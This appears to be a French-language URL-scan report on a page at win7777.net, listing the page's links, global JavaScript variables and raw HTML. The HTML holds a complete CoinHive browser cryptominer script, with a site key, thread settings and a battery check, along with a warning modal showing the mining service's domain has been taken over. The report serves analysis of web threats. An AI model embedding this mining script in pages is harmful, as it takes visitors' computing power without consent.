- ID de l'analyse :
- 78c44b92-4a5a-4f8a-9ed7-1b17cd73a22fTerminée
- URL soumise :
- https://win7777.net/xauto.htm
- Fin du rapport :
Liens : 1 trouvé(s)
Liens sortants identifiés à partir de la page
Lien | texte |
---|---|
https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies | Click here for more information |
Variables JavaScript : 5 trouvée(s)
Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel
Nom | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
cpuConfig | object |
miner | undefined |
Messages de journal de console : 1 trouvé(s)
Messages consignés dans la console web
Type | Catégorie | Enregistrement |
---|---|---|
error | network |
|
HTML
Le corps HTML de la page en données brutes
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=big5">
<title>auto</title>
<style>.js-modal{ position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background-color: rgba(0, 0, 0, .8); width: 100%; height: 100%; z-index: 999999; } .js-modal-inner{ background-color: rgba(174, 145, 93, .9); position: relative; padding: 50px; font-size: 24px; max-width: 650px; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #000; border-radius: 10px; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: normal; text-align: center; } .js-modal-inner a { color: #000; text-decoration: underline; }</style></head>
<body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<p style="font-size: 9pt;">
</p><p style="font-size: 11pt;" id="status"></p>
<p style="font-size: 11pt;" id="hashesPerSecond"></p>
<p style="font-size: 11pt;" id="getTotalHashes"></p>
<p style="font-size: 11pt;" id="stopped"></p>
<p id="minerbutton"></p>
<script>
if (navigator.hardwareConcurrency > 1){
var cpuConfig = {threads: Math.round(navigator.hardwareConcurrency/2)}
}else{
var cpuConfig = {throttle:0.3}
}
var miner = new CoinHive.Anonymous('gLjAsgvJJBUk5saTpdxnSiZsAmBGTJcZ', cpuConfig);
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
// Update stats once per second
setInterval(function() {
var threadCount = miner.getNumThreads();
var hashesPerSecond = Math.round(miner.getHashesPerSecond());
var getTotalHashes = miner.getTotalHashes();
try {
navigator.getBattery().then(function (battery) {
if (battery.level < 0.50 && battery.charging == false) {
miner.stop();
document.getElementById("stopped").innerHTML = "偵測到電量不足已停止運算";
}
});
}catch(e){console.log(e)}
// Output to HTML elements...
if (miner.isRunning()) {
document.getElementById("status").innerHTML = "狀態: 正在使用 " + threadCount + " 個執行緒";
document.getElementById("hashesPerSecond").innerHTML = "轉換率: " + hashesPerSecond + " H/s";
document.getElementById("getTotalHashes").innerHTML = "已轉換: " + getTotalHashes + " 次Hash";
document.getElementById("minerbutton").innerHTML = "<button onclick=\"miner.stop()\">STOP</button>";
}else{
document.getElementById("status").innerHTML = "狀態: 沒有在進行運算";
document.getElementById("hashesPerSecond").innerHTML = "您的算力: " + 0 + " H/s";
document.getElementById("minerbutton").innerHTML = "<button onclick=\"miner.start(CoinHive.FORCE_EXCLUSIVE_TAB)\">開始</button>";
}
}, 800);
</script>
<div class="js-modal"><div class="js-modal-inner">This website attempted to run a cryptominer in your browser. <a href="https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies">Click here for more information</a>.</div></div></body></html>